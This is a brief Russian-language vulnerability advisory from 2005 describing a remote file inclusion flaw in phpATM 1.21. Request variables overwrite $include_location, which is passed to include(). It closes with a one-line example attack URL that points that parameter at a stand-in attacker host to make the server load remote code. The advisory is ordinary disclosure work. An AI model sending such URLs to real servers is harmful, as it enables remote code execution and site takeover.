Уязвимость в phpATM

22/05/2005 10:01

phpATM позволяет осуществить выполнение произвольного кода через удаленные инъекции, при условии установленного allow_url_fopen. Лист глобальных переменных $include_location используется с include() и может быть использован атакующим для запуска любого кода с привилегиями веб-пользователя. Проблема в безопасности находится в файле `include/common.php' рядом со строкой 91, где содержимое суперглобальных массивов переведено в глобальный контекст. Этим можно воспользоваться для переписывания ранее объявленной $include_location. Уязвимость подтверждена в версии 1.21, возможно наличие её и в более ранних. Пример атаки - http://victim/index.php?include_location=http://attacker/
Описание